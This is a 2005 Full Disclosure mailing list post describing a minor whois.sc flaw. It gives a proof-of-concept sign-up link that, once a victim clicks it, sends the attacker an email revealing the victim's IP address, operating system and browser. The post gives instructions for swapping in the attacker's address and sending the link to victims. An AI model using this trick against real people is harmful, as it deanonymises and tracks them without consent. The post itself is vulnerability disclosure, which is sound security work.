Full Disclosure mailing list archives
whois.sc not-big-deal hole (2nd post)
From: unknown unknown <unknown.pentester () gmail com>
Date: Thu, 3 Nov 2005 09:30:19 +0000
I just forgot to mention in the previous post that after the victim clicks on the specially-crafted link, the attacker should be able to receive an account sign-up email with the following information about the victim (located at the bottom of the email body): - IP Address - Operating system version - Web browser version The bottom of the email looks like this (some information has been hidden): --------------------------------------------------- NOTE: You received this message because someone from X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X) Gecko/2005XXXX Firefox/X.X.X) requested an account for this email address. If you did not request this account please ignore this message and you will not be contacted again. --------------------------------------------------- PoC: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com Replace "attacker%40gmail.com" in the previous link with your own email address (e.g.: myself%40gmail.com) and send it to the victim. Note: the only limitation of this "trick" is that the attacker needs to use a different email address for each attack. This is because whois.sc will set the account activation status to "pending" after requesting the account activation for the first time. Regards, pagvac _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- whois.sc not-big-deal hole (2nd post) unknown unknown (Nov 03)